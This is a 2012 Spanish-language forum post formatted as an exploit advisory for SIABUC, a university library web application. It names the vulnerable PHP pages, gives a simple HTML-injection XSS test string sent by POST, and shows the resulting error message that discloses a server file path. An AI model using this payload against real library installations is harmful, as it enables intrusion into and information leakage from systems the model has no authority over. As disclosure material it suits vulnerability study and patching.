Xss & Full path Disclosure WebApp Library SIABUC

Iniciado por MaztoR, Julio 07, 2012, 03:41:09 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

# Author: Mazt0r
# Exploit Title: XSS & Full Path Disclosure SIABUC
# Date: 24/02/2012
# software: SIABUC
# link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
# Version: Version 1.2 [Other versions "NO TESTED"]
# Category: webapps Library
# Tested on: Linux

Demo:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

----------------
Vulnerable
----------------
/reservacion/index.php
/reservacion/include/buscar.php

Exploit:
======================

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

POST: XSS
Result: /reservacion/include/buscar.php
======================
Example:
======================

|---------------------|
|" > < h1 > A < / h1 >|
|---------------------|
\
- Execution Code

Result FPD: Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***


"© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"

----------------------------------
Blog: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Twitter: @Mazt0r
----------------------------------
-------------------------------------
| Twitter: @Mazt0r                
| Site: www.maztor.com        
| Skype: Maztor-                    
-------------------------------------